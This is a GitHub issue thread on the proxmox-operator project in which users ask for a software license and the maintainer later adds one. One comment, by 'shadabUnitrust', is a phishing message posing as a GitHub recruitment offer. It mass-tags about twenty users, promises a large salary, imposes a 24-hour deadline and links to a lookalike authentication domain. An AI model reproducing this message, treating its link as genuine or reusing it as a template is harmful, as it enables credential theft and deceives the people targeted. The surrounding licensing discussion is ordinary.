### ISSUE TITLE
License?

### ISSUE THREAD

**Issue by dhess** [CRASH-Tech/proxmox-operator#9]
There's no license for this project. It would be helpful if you could add one :)

**Comment by CRASH-Tech** [comment]
Hello! This is free home project, I didn't think about any licence. It can be any free license.

**Comment by shadabUnitrust** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
sebastiandg7, @PaulRBerg, @quintinchris, @Johnskotts, @allenlooplee, @krrrisss, @ivancsicsmarkus, @Batxent, @Sharp-Lee, @verdinjoshua1982, @nuoyz, @yeecai, @Dalu26, @ruevaughn, @eddieran, @maf654321, @mastercyb, @Bardiamist, @msbolang, @thecatshidog

**Comment by Deltachaos** [comment]
I would like to send a PR for the project to add support for lxc containers. If you would add a LICENSE it would allow me to derive from your code.

If you cant decide on a license, Kubernetes itself is licensed under Apache 2.0. Would love to use your project, but without a set LICENSE it will probably not be possible.

**Comment by CRASH-Tech** [comment]
> I would like to send a PR for the project to add support for lxc containers. If you would add a LICENSE it would allow me to derive from your code.
> 
> If you cant decide on a license, Kubernetes itself is licensed under Apache 2.0. Would love to use your project, but without a set LICENSE it will probably not be possible.

Hello! I added a license, PR welcome!
